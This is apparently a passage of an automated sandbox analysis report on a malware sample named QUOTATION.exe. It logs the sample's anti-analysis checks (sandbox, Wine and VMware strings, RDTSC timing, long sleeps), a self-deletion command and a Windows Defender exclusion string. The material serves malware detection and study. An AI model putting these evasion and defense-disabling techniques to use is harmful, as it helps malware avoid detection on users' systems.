Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_003642DB push ss; iretd	1_2_003642F6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00DAE768 pushfd ; ret	1_2_00DAE769
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 13_2_0033424F push es; iretd	13_2_0033425C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 13_2_003342B1 push cs; iretd	13_2_003342CC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 13_2_00334287 push cs; iretd	13_2_003342B0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 13_2_003342DB push ss; iretd	13_2_003342F6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00417015 push esp; retf	17_2_00417041
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041690B push cs; ret	17_2_0041690E
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041D4B5 push eax; ret	17_2_0041D508
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041D56C push eax; ret	17_2_0041D572
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041D502 push eax; ret	17_2_0041D508
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041D50B push eax; ret	17_2_0041D572
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0052424F push es; iretd	17_2_0052425C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_005242DB push ss; iretd	17_2_005242F6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00524287 push cs; iretd	17_2_005242B0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_005242B1 push cs; iretd	17_2_005242CC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0102D0D1 push ecx; ret	17_2_0102D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0329D0D1 push ecx; ret	24_2_0329D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_00747015 push esp; retf	24_2_00747041
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074690B push cs; ret	24_2_0074690E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074DC11 push gs; ret	24_2_0074DC13
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074D4B5 push eax; ret	24_2_0074D508
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074D56C push eax; ret	24_2_0074D572
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074D502 push eax; ret	24_2_0074D508
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074D50B push eax; ret	24_2_0074D572

Source: initial sample	Static PE information: section name: .text entropy: 7.84988973797
Source: initial sample	Static PE information: section name: .text entropy: 7.84988973797

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\QUOTATION.exe"			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 1.2.QUOTATION.exe.2751384.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION.exe PID: 6924, type: MEMORYSTR

Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000739904 second address: 000000000073990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000739B7E second address: 0000000000739B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6928	Thread sleep time: -38290s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2808	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6172	Thread sleep time: -32000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7319			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1199			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Thread delayed: delay time: 38290	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
